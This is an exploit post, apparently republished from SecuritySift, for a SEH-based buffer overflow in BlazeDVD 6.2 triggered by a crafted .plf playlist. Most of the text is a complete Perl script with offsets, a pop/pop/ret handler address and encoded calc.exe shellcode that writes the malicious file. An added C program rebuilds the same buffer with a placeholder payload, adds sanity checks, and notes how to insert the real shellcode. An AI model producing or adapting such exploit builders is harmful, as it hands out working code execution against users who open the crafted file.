BlazeDVD 6.2 (.plf) - Buffer Overflow (SEH)
Source: @SecuritySift  Author: Czumak  Published: 2013-10-29
#!/usr/bin/perl
  
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe
#   (link as published; it points at a VideoCharge installer, not BlazeDVD)
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file 
#########################################################################################

use strict;
use warnings;

my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nSEH is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite nSEH with "jmp short +8" (EB 08): rel8 counts from the
                               # byte after the 2-byte jmp, so it hops over the 4-byte SEH handler
                               # pointer and lands 2 bytes into the NOP sled below
my $seh = pack('V',0x6033aa41); # overwrite SEH with pop ecx / pop ecx / ret (little-endian)
                # ASLR: False, Rebase: False, SafeSEH: False, OS: False
                # \Program Files\BlazeVideo\BlazeDVD 6.1\Configuration.dll
  
my $nops = "\x90" x 20; # pad shellcode 
  
# Calc.exe payload [size 461] -- Mind the encoding!
# msfpayload windows/exec CMD=calc.exe R | 
# msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
my $shell = "\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35" .
"\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e" .
"\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63" .
"\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63" .
"\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65" .
"\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68" .
"\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42" .
"\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55" .
"\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51" .
"\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47" .
"\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55" .
"\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75" .
"\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34" .
"\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65" .
"\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d" .
"\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62" .
"\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37" .
"\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c" .
"\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31" .
"\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53" .
"\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55" .
"\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56" .
"\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49" .
"\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59" .
"\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45" .
"\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36" .
"\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77" .
"\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33" .
"\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41";
  
my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble the sploit
my $fill = "\x43" x ($buffsize - (length($sploit))); # create buffer fill 
my $buffer = $sploit.$fill; # assemble final buffer
  
# write the exploit buffer to file
my $file = "blazesploit.plf";
open(my $fh, '>', $file) or die "Cannot open $file for writing: $!";
binmode($fh); # raw bytes, no newline translation on Windows
print $fh $buffer;
close($fh) or die "Cannot close $file: $!";
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($buffer) . "\n";
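Added example, not Czumak's code and not part of the original post: a C program that lays out the same buffer (junk, nSEH "jmp short", pop/pop/ret handler, NOP sled, payload, fill to 10000 bytes) and checks it before writing the .plf. The offsets, handler address and bad-character list are taken from the script above; the shellcode is a constructed 8-byte int3 stand-in, so the file this writes only breaks into a debugger rather than running calc.exe. The check computes where the short jump actually lands (nSEH + 2 + 8 = offset 878, two bytes into the sled) and scans the whole buffer for the bad characters the payload was encoded to avoid, which is the sanity pass worth running before opening a crafted file under a debugger.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFF_SIZE    10000   /* total file size, as in the exploit above */
#define NSEH_OFFSET  868     /* nSEH lands here; SEH handler pointer at +4 */
#define NOP_COUNT    20

/* Values taken from the exploit above */
static const uint32_t PPR_ADDR    = 0x6033aa41;           /* pop ecx / pop ecx / ret */
static const uint8_t  BAD_CHARS[] = { 0x00, 0x0a, 0x0d, 0xff };

/* Constructed stand-in for the 461-byte calc.exe payload: eight int3s.
   Swap in the real encoded shellcode to produce the working file. */
static const uint8_t DEMO_SHELL[] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

/* Lay out junk | nSEH | SEH | NOP sled | shellcode | fill into out (>= BUFF_SIZE bytes).
   Returns the number of bytes written, or 0 if the payload does not fit. */
size_t build_seh_buffer(uint8_t *out, size_t out_len,
                        const uint8_t *shell, size_t shell_len)
{
    size_t used = NSEH_OFFSET + 4 + 4 + NOP_COUNT + shell_len;
    if (out_len < BUFF_SIZE || used > BUFF_SIZE)
        return 0;

    uint8_t *p = out;
    memset(p, 0x41, NSEH_OFFSET);                   /* junk up to nSEH */
    p += NSEH_OFFSET;

    /* nSEH: "jmp short +8" (EB 08). rel8 counts from the byte after the
       2-byte instruction, so execution hops over the 4-byte handler pointer
       plus 2 more bytes and lands inside the NOP sled. */
    p[0] = 0xeb; p[1] = 0x08; p[2] = 0x90; p[3] = 0x90;
    p += 4;

    /* SEH: pop/pop/ret address, little-endian like Perl's pack('V') */
    p[0] = (uint8_t)(PPR_ADDR);
    p[1] = (uint8_t)(PPR_ADDR >> 8);
    p[2] = (uint8_t)(PPR_ADDR >> 16);
    p[3] = (uint8_t)(PPR_ADDR >> 24);
    p += 4;

    memset(p, 0x90, NOP_COUNT);                     /* sled */
    p += NOP_COUNT;
    memcpy(p, shell, shell_len);                    /* payload */
    p += shell_len;
    memset(p, 0x43, BUFF_SIZE - (size_t)(p - out)); /* fill to fixed size */
    return BUFF_SIZE;
}

/* Offset the nSEH short jump transfers to, or 0 if nSEH is not a jmp short. */
size_t nseh_jmp_target(const uint8_t *buf)
{
    const uint8_t *n = buf + NSEH_OFFSET;
    if (n[0] != 0xeb)
        return 0;
    return NSEH_OFFSET + 2 + (int8_t)n[1];
}

/* Handler pointer exactly as the exception dispatcher will read it. */
uint32_t seh_handler(const uint8_t *buf)
{
    const uint8_t *s = buf + NSEH_OFFSET + 4;
    return (uint32_t)s[0] | (uint32_t)s[1] << 8 | (uint32_t)s[2] << 16 | (uint32_t)s[3] << 24;
}

/* First offset in [0, len) holding a bad character, or -1 if there is none. */
long find_bad_char(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < sizeof BAD_CHARS; j++)
            if (buf[i] == BAD_CHARS[j])
                return (long)i;
    return -1;
}

/* Builds the demo buffer once and returns it (NULL if the payload did not fit). */
const uint8_t *demo_buffer(void)
{
    static uint8_t buf[BUFF_SIZE];
    static size_t len;
    if (len == 0)
        len = build_seh_buffer(buf, sizeof buf, DEMO_SHELL, sizeof DEMO_SHELL);
    return len ? buf : NULL;
}

int main(void)
{
    const uint8_t *buf = demo_buffer();
    if (!buf) { fprintf(stderr, "payload does not fit\n"); return 1; }

    size_t sled_start = NSEH_OFFSET + 8, sled_end = sled_start + NOP_COUNT;
    size_t target = nseh_jmp_target(buf);
    long bad = find_bad_char(buf, BUFF_SIZE);
    printf("SEH handler 0x%08x, jmp lands at %zu (sled %zu..%zu), first bad char at %ld\n",
           (unsigned)seh_handler(buf), target, sled_start, sled_end - 1, bad);
    if (target < sled_start || target >= sled_end || bad != -1)
        return 1;                                   /* refuse to write a broken file */

    FILE *f = fopen("blazesploit.plf", "wb");
    if (!f) { perror("fopen"); return 1; }
    fwrite(buf, 1, BUFF_SIZE, f);
    fclose(f);
    return 0;
}
```

The two checks in main are the ones that bite in practice: a jmp short that lands outside the sled (wrong rel8, or a sled that was shortened) silently executes handler-pointer bytes as code, and a single bad byte anywhere before the payload truncates or corrupts the buffer on the way in, not just inside the shellcode. Both failures look the same from the debugger (an access violation somewhere unexpected), so it is cheaper to catch them in the builder.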

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved